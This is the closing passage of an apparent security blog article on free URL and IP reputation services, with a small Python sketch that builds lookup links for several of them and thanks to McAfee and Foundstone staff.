In this article we examined a number of free sites that provide reputation information, as well as sites that will evaluate the content of potentially malicious sites. All of these services can be very useful in determining (or ruling out) the malicious intent of suspicious URLs and IP addresses. Many of the sites expose an API for automated queries. The list we provided here is not intended to be all encompassing; however, Googling for these sites does not always surface the best options either. So if you have a favorite gem that was not included in this article, please feel free to share it below; we are interested in your experiences as well. :)
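As a small convenience, the lookup pages of several of these services follow simple URL patterns, so a first-pass check can be scripted. A sketch follows; only the Safe Browsing pattern is quoted from this article, while the other patterns are illustrative and may change without notice:

```python
# Sketch: build lookup URLs for a suspect site across several of the
# services above. Only the Safe Browsing diagnostic pattern is quoted
# from this article; the others are illustrative and may change.
from urllib.parse import quote

LOOKUPS = {
    "google_safebrowsing":
        "http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site={}",
    "urlvoid": "http://www.urlvoid.com/scan/{}",
    "siteadvisor": "http://www.siteadvisor.com/sites/{}",
}

def lookup_urls(site):
    # URL-encode the target and drop it into each service's pattern
    return {name: pattern.format(quote(site, safe=""))
            for name, pattern in LOOKUPS.items()}

urls = lookup_urls("example.com")
print(urls["google_safebrowsing"])
```

Opening these in a browser (or fetching them from a sandboxed analysis box) beats retyping the suspect hostname into each site by hand.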


Thanks goes out to Vimal Navis of McAfee and Kerry Steele and Drew Thompson of Foundstone for recommending some of these great third party resources.